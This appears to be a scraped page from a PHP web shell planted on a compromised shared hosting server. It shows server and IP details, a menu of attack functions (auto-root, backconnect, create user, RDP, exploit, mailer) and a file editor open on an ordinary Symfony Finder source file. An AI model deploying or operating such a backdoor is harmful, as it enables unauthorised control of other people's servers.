Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
symfony /
finder /
Iterator /
[ HOME SHELL ]
Name
Size
Permission
Action
CustomFilterIterator.php
1.48
KB
-rw-r--r--
DateRangeFilterIterator.php
1.41
KB
-rw-r--r--
DepthRangeFilterIterator.php
1.2
KB
-rw-r--r--
ExcludeDirectoryFilterIterator...
2.4
KB
-rw-r--r--
FileTypeFilterIterator.php
1.31
KB
-rw-r--r--
FilecontentFilterIterator.php
1.41
KB
-rw-r--r--
FilenameFilterIterator.php
1.15
KB
-rw-r--r--
FilterIterator.php
1.7
KB
-rw-r--r--
MultiplePcreFilterIterator.php
3.12
KB
-rw-r--r--
PathFilterIterator.php
1.42
KB
-rw-r--r--
RecursiveDirectoryIterator.php
4.54
KB
-rw-r--r--
SizeRangeFilterIterator.php
1.38
KB
-rw-r--r--
SortableIterator.php
2.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SizeRangeFilterIterator.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Finder\Iterator; use Symfony\Component\Finder\Comparator\NumberComparator; /** * SizeRangeFilterIterator filters out files that are not in the given size range. * * @author Fabien Potencier <fabien@symfony.com> */ class SizeRangeFilterIterator extends FilterIterator { private $comparators = []; /** * @param \Iterator $iterator The Iterator to filter * @param NumberComparator[] $comparators An array of NumberComparator instances */ public function __construct(\Iterator $iterator, array $comparators) { $this->comparators = $comparators; parent::__construct($iterator); } /** * Filters the iterator values. * * @return bool true if the value should be kept, false otherwise */ public function accept() { $fileinfo = $this->current(); if (!$fileinfo->isFile()) { return true; } $filesize = $fileinfo->getSize(); foreach ($this->comparators as $compare) { if (!$compare->test($filesize)) { return false; } } return true; } }
Close